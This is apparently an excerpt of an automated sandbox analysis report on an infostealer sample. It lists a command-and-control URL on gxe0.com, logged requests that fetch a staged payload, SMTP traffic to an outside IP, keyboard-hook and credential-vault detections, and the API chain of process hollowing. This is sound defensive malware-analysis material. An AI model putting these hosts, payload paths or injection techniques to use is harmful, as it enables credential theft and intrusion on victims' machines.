                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 028B7394h10_2_028B7108
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then jmp 028B78DCh10_2_028B767A
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_028B7E60
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_028B7E5E
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeCode function: 4x nop then jmp 065BBCBDh15_2_065BBA40

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7E4B8 InternetCheckConnectionA,0_2_02E7E4B8
                      Source: global trafficTCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587
                      Source: Joe Sandbox ViewIP Address: 198.252.105.91 198.252.105.91
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
                      Source: global trafficTCP traffic: 192.168.2.5:49707 -> 51.195.88.199:587
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /yak/233_Wisrysxlfss HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: gxe0.com
                      Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
                      Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4530947899.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                      Source: neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s82.gocheapweb.com
                      Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                      Source: 2jbMIxCFsK.exe, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002229C000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020D44000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050268749.0000000002CCD000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2173838479.0000000002CC9000.00000004.00000020.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2237079375.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020CC3000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2225406008.00000000225FF000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2050539495.000000007F920000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2224009200.000000002223D000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 00000008.00000000.2153332087.0000000000416000.00000002.00000001.01000000.00000006.sdmp, Wisrysxl.PIF, 00000016.00000002.2321565604.0000000002E22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000017.00000000.2301803862.0000000000416000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.pmail.com
                      Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: neworigin.exe, 00000009.00000002.2419547129.0000000005DBE000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2320882998.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2419547129.0000000005D61000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.0000000002871000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000002.2417679749.0000000005D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: powershell.exe, 0000000B.00000002.2254342461.0000000004BA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://api.ipify.org
                      Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: neworigin.exe, 00000009.00000002.2359317927.0000000002661000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000000B.00000002.2254342461.0000000004CF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2286081090.00000000075F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000626000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysx
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2202959804.0000000020DE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfss
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.00000000005BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfsse
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com/yak/233_Wisrysxlfssl
                      Source: 2jbMIxCFsK.exe, 00000000.00000002.2156227554.0000000000630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gxe0.com:443/yak/233_Wisrysxlfss
                      Source: powershell.exe, 0000000B.00000002.2278069246.0000000005C09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49752 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 24_2_0640C970 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0640D7F0,00000000,0000000024_2_0640C970
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary

                      barindex
                      Source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPEDMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: server_BTC.exe.8.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: TrojanAIbot.exe.10.dr, opqcmgIPmeabY.csLong String: Length: 17605
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E78670 NtUnmapViewOfSection,0_2_02E78670
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E78400 NtReadVirtualMemory,0_2_02E78400
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E77A2C NtAllocateVirtualMemory,0_2_02E77A2C
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02E7DC8C
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02E7DC04
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E78D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02E78D70
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02E7DD70
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E77D78 NtWriteVirtualMemory,0_2_02E77D78
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E77A2A NtAllocateVirtualMemory,0_2_02E77A2A
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7DBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02E7DBB0
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E78D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02E78D6E
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB8670 NtUnmapViewOfSection,22_2_02DB8670
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB8400 NtReadVirtualMemory,22_2_02DB8400
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB7A2C NtAllocateVirtualMemory,22_2_02DB7A2C
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB7D78 NtWriteVirtualMemory,22_2_02DB7D78
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB8D70 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,22_2_02DB8D70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DBDD70 NtOpenFile,NtReadFile,NtClose,22_2_02DBDD70
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB86F7 NtUnmapViewOfSection,22_2_02DB86F7
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB7AC9 NtAllocateVirtualMemory,22_2_02DB7AC9
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB7A2A NtAllocateVirtualMemory,22_2_02DB7A2A
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFCode function: 22_2_02DB8D6E Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,22_2_02DB8D6E
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E7F7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02E7F7C8
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E620C40_2_02E620C4
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_009E41C89_2_009E41C8
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_009E4A989_2_009E4A98
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeCode function: 9_2_009EEA809_2_009EEA80
